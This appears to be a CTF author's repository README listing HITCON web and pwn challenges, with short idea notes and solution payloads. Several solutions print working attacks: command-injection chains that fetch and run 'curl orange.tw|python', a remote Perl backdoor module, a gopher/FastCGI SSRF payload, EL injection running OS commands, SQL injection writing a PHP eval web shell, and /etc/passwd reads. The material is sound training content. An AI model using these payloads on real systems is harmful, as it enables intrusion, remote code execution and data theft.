This is the repo of CTF challenges I made, including the source code, write-up and idea explanation! Hope you like it :)
P.s. BTW, Babyfirst series are my favorite in all challenges. If you don't have time to see all, please look the them at least!
You can contact me via:
Table of Content
One Line PHP Challenge
Difficulty: ★★★★
Solved: 3 / 1816
Tag: PHP
Source Code
Solution
P.S. This is a default installation PHP7.2 + Apache on Ubuntu 18.04
- Control partial session file content by
PHP_SESSION_UPLOAD_PROGRESS - Bypass
session.upload_progress.cleanup = Onbyrace conditionorslow query - Control the prefix to
@<?phpby chaining PHP wrappers
Write Ups
- (English)One Line PHP Challenge
- (中文)One Line PHP Challenge
- hitcon2018 One Line PHP Challenge
- hitcon 2018受虐笔记一:one-line-php-challenge 学习
Baby Cake
Difficulty: ★★★
Solved: 4 / 1816
Tag: Code Review, PHP, De-serialization
Source Code
Solution
Due to the implement of CURLOPT_SAFE_UPLOAD in CakePHP FormData.php. We can read arbitrary files!
# arbitrary file read, listen port 12345 on your server http://13.230.134.135/ ?url=http://your_ip:12345/ &data[x]=@/etc/passwd # arbitrary de-serialization the Monolog POP chain http://13.230.134.135/ ?url=http://your_ip:12345/ &data[x]=@phar://../tmp/cache/mycache/[you_ip]/[md5_of_url]/body.cache
Write Ups
Oh My Raddit
Difficulty: ★★☆
Solved: 27 / 1816
Tag: Observation, DES checksum, Crypto, Web
Source Code
Solution
- Know
ECBmode from block frequency analysis - Know
block size = 8from cipher length - From the information above, it's reasonable to use
DESin real world - The most common block is
3ca92540eb2d0a42(always in the cipher end). We can guess it's the padding\x08\x08\x08\x08\x08\x08\x08\x08 - Due to the checking parity in DES, we can reduce the keyspace from 26(
abcdefghijklmnopqrstuvwxyz) to 13(acegikmoqsuwy)- Break in 1 second with
HashCat - Break in 10 minutes with single thread Python
- Break in 1 second with
Write Ups
Oh My Raddit v2
Difficulty: ★★
Solved: 10 / 1816
Tag: Web.py, SQL Injection to RCE
Source Code
Solution
-
Read the package version from
requirements.txt
Write Ups
Why so Serials?
Difficulty: ★★★★
Solved: 1 / 1816
Tag: De-serialization, RCE, ASP.NET, View State
Source Code
Solution
- Get the
machineKeyinweb.configby Server-Side-Includes(.shtmlor.stm) - Exploit
ASP.NET___VIEWSTATEby ysoserial.net
Write Ups
BabyFirst Revenge
Difficulty: ★☆
Solved: 95 / 1541
Tag: WhiteBox, PHP, Command Injection
Idea
- Command Injection, but only in 5 bytes
Source Code
Solution
# generate `ls -t>g` to file "_" http://host/?cmd=>ls\ http://host/?cmd=ls>_ http://host/?cmd=>\ \ http://host/?cmd=>-t\ http://host/?cmd=>\>g http://host/?cmd=ls>>_ # generate `curl orange.tw|python` to file "g" http://host/?cmd=>on http://host/?cmd=>th\ http://host/?cmd=>py\ http://host/?cmd=>\|\ http://host/?cmd=>tw\ http://host/?cmd=>e.\ http://host/?cmd=>ng\ http://host/?cmd=>ra\ http://host/?cmd=>o\ http://host/?cmd=>\ \ http://host/?cmd=>rl\ http://host/?cmd=>cu\ http://host/?cmd=sh _ # got shell http://host/?cmd=sh g
You can check the exploit.py for the detail! And there are also lots of creative solutions, you can check the write ups below.
Write Ups
- HITCON CTF 2017-BabyFirst Revenge-writeup
- HITCON CTF 2017-BabyFirst Revenge-writeup (Via curl)
- HITCON 2017 CTF BabyFirst Revenge
- HITCON CTF 2017 - BabyFirst Revenge (172 pts.)
- Hitcon CTF 2017 - Baby Revenge
- Hitcon CTF 2017 Quals: Baby First Revenge (web 172) (Via xxd)
- HITCON CTF 2017 BabyFirst Revenge & v2 writeup
- BabyFirst-Revenge-HITCOIN-2017-QUALS by @n4p5ter
BabyFirst Revenge v2
Difficulty: ★★★★
Solved: 8 / 1541
Tag: WhiteBox, PHP, Command Injection
Idea
- Command Injection, but only in 4 bytes
Source Code
Solution
- generate
g> ht- slto filev - reverse file
vto filex - generate
curl orange.tw|python; - execute
x,ls -th >g - execute
g
You can check exploit.py for the detail!
Write Ups
- Baby First Revenge v2 (Via vim) by @bennofs
- [python] baby-exp.py
- How to solve a CTF challenge for $20 - HITCON 2017 BabyFirst Revenge v2
- HITCON CTF 2017 BabyFirst Revenge & v2 writeup
SSRFme?
Difficulty: ★★☆
Solved: 20 / 1541
Tag: WhiteBox, Perl, PATH Pollution
Idea
- CVE-2016-1238 (But the latest version of Ubuntu 17.04 in AWS is still vulnerable)
- Perl lookup current directory in module importing
- Perl module URI/lib/URI.pm#L136 will
evalif there is a unknown scheme
Source Code
$ sudo apt install libwww-perl
Solution
# write evil URI module to current directory $ curl http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl # eval evil module `orange` $ curl http://host/?filename=xxx&url=orange://orange.tw
Write Ups
SQL so Hard
Difficulty: ★★★
Solved: 10 / 1541
Tag: WhiteBox, MySQL, PostgreSQL, SQL Injection, Code Injection
Idea
- MySQL
max_allowed_packetdropped large size SQL sentence - Node-Postgres - code execution vulnerability
- Exploit the RCE in SQL
UPDATEsyntax
Source Code
Solution
Write Ups
Baby^H Master PHP 2017
Difficulty: ★★★★☆
Solved: 0 / 1541
Tag: WhiteBox, PHP, Serialization, Apache Prefock
Idea
- PHP do the de-serialization on
PHARparsing - PHP assigned a predictable function name
\x00lambda_%dto an anonymous function - Break shared VARIABLE state in Apache Pre-fork mode
Source Code
Solution
# get a cookie $ curl http://host/ --cookie-jar cookie # download .phar file from http://orange.tw/avatar.gif $ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/' # force apache to fork new process $ python fork.py & # get flag $ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"
Write Ups
papapa
Difficulty: ★
Solved: 71 / 1024
Tag: BlackBox, SSL, Pentesting
Idea
- Leak the internal hostname from SSL certificate
Source Code
Solution
$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternativer Name" ... depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = [email protected] ... # get flag $ curl -k -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/
Write Ups
- HITCON 2016
- HITCON CTF 2016: %%% (Web) Write-up
- [HITCON 2016] [WEB 100 - %%%] WRITE UP
- hitcon2016 web writeup
Leaking
Difficulty: ★★
Solved: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS
Idea
- Break JavaScript Sandbox
- Use NodeJS
Buffer(int)to steal uninitialized memory - Node.js Buffer knows everything
Source Code
Solution
$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;
Write Ups
BabyTrick
Difficulty: ★★★
Solved: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize
Idea
- Create an Unexpected Object and Don't Invoke __wakeup() in Deserialization
- SugarCRM v6.5.23 PHP反序列化對象注入漏洞
- MySQL UTF-8 collation -
SELECT 'Ä'='a'is True
Source Code
Solution
# get password curl http://1.2.3.4/ ?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}} # get flag curl http://1.2.3.4/ ?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}
Write Ups
Angry Boy
Difficulty: ★★☆
Solved: 43 / 1024
Tag: GrayBox, Java
Idea
new String(new byte[] {1, -1, 1, -1})will output01EFBFBD01EFBFBD, not01FF01FF- When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions
Source Code
Solution
Write Ups
Angry Seam
Difficulty: ★★★★
Solved: 4 / 1024
Tag: GrayBox, Java, Seam Framework, CSS RPO, EL Injection, Java Deserialization
Idea
- CSS Relative Path Overwrite
- Built-in redirection parameter
actionOutcome - RPO Gadgets
- CVE-2010-1871: JBoss Seam Framework remote code execution
Source Code
Solution
P.s. I made this challenge because once when I try to review the code of Seam Framework, I found some 0-days and I think it must have more. So I throw out the brick to attract a jade. And the result is more than I expected :P
Intended solution
-
Register an account
username: `AAAAAA` password: `AAAAAA` realname: `{/*';*/}%0a@import'http://orange.tw/?` -
Report URL
http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom>e=/profile.seam?username%3dAAAAAA
Unintended solution
- Register an account
- Update description to
- Login and access
/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}
GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1
host: 1.2.3.4
cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}
ccc: ls -alh
...
Unintended solution
- CVE-2013-2165 Java deserialization vulnerability
Unintended solution
- SESSION manipulation... seam SUCKS
Write Ups
Babyfirst
Solved: 33 / 969
Difficulty: ★★
Tag: WhiteBox, PHP, Command Injection
Idea
- Use
NewLineto bypass regular expression check - Command injection only with alphanumeric characters
Source Code
<?php highlight_file(__FILE__); $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR']; if ( !file_exists($dir) ) mkdir($dir); chdir($dir); $args = $_GET['args']; for ( $i=0; $i<count($args); $i++ ){ if ( !preg_match('/^\w+$/', $args[$i]) ) exit(); } exec("/bin/orange " . implode(" ", $args)); ?>
Solution
http://localhost/
?args[0]=x%0a
&args[1]=mkdir
&args[2]=orange%0a
&args[3]=cd
&args[4]=orange%0a
&args[5]=wget
&args[6]=846465263%0a
http://localhost/
?args[0]=x%0a
&args[1]=tar
&args[2]=cvf
&args[3]=aa
&args[4]=orange%0a
&args[5]=php
&args[6]=aa
And there are also lots of creative solutions, you can check the write ups below.
Write Ups
- babyfirst (web 100)
- HITCON CTF 2015 Web 100 Web 300 Writeup
- HITCON 2015 Quals: Babyexploit
- Babyfirst (web, 100p, ?? solves)
nanana
Difficulty: ★★★
Solved: 18 / 969
Tag: GrayBox, C, PWN
Idea
- Pwn without library
- Format String without output
- Bypass Stack Guard by using overflow
ARGV[1]
Source Code
Solution
Write Ups
- nanana (pwn, web 200)
- HITCON 2015 Quals: Nanana
- Pwning (sometimes) with style - Dragons’ notes on CTFs
Giraffe's Coffee
Difficulty: ★★★☆
Solved: 16 / 969
Tag: WhiteBox, PHP
Idea
- Break PHP PRNG
- Break shared PRNG STATE in Apache Prefork mode
Source Code
Solution
TBD
Write Ups
- HITCON CTF 2015 Web 100 Web 300 Writeup
- Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)
- HITCON 2015 WEB 300
lalala
Difficulty: ★★★☆
Solved: 2 / 969
Tag: BlackBox, PHP, SSRF
Idea
- Bypass SSRF restrictiton with 302 redirect
- Exploit FASTCGI protocol by using GOPHER
Source Code
Solution
<?php header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );
Write Ups
Use-After-FLEE
Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN
Idea
- Bypass open_basedir
- Bypass disable_functions
- PHP use-after-free exploit writing
- Bypass full protection (DEP / ASLR / PIE / FULL RELRO)
- Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
Source Code
Solution
TBD
Write Ups
PUSHIN CAT
Solved: 8 / 1020
Difficulty: ★★
Platform: BlackBox, PHP, H2, SQL Injection
Idea
- SQL Injection on H2 Database
- Execute Code by using H2 SQL Injection
Source Code
Solution
TBD
Write Ups
- HITCON CTF 2014: PUSHIN CAT
- HITCON CTF 2014 - PUSHIN CAT (H2 DB Insert SQL Injection)
- HITCON CTF 2014
PY4H4SHER
Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision, HPP
Idea
- Python CGI HTTP Pollution
- MySQL old_password hash collisions
- PBKDF2+HMAC hash collisions explained
Source Code
Solution
TBD
Write Ups
LEENODE
Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache
Idea
- Multilayered architecture vulnerability
- Double Encoding
Source Code
Solution
# get password $ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm # get flag $ curl http://1.2.3.4/admin/thefl4g.txt
Write Ups
BlackBox
Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF
Idea
- Multilayered architecture vulnerability
- Default and up to date mod_jk leads to directory travesal
- Bypass WAF by incorrect usage of BASE64 and URLENCODE
- SQL Injection on H2 Database
- Execute Code by using H2 SQL Injection
Source Code
Solution
-
Get source code
http://1.2.3.4/login/..;/ -
Review code and find a way to bypass WAF
$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--" $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"
-
Write shell
$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--" $ curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'
Write Ups
TBD
SQLPWN
Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, PHP, SQL Injection, LFI, Race Condition
Idea
- One-byte off SQL Injection
- Race Condition
- Local file inclusion with PHP session
Source Code
Solution
-
Run exploit.py to win race condition
-
Login and SQL Injection
$ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\¬e=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#' -
Local file inclusion with session
$ curl http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220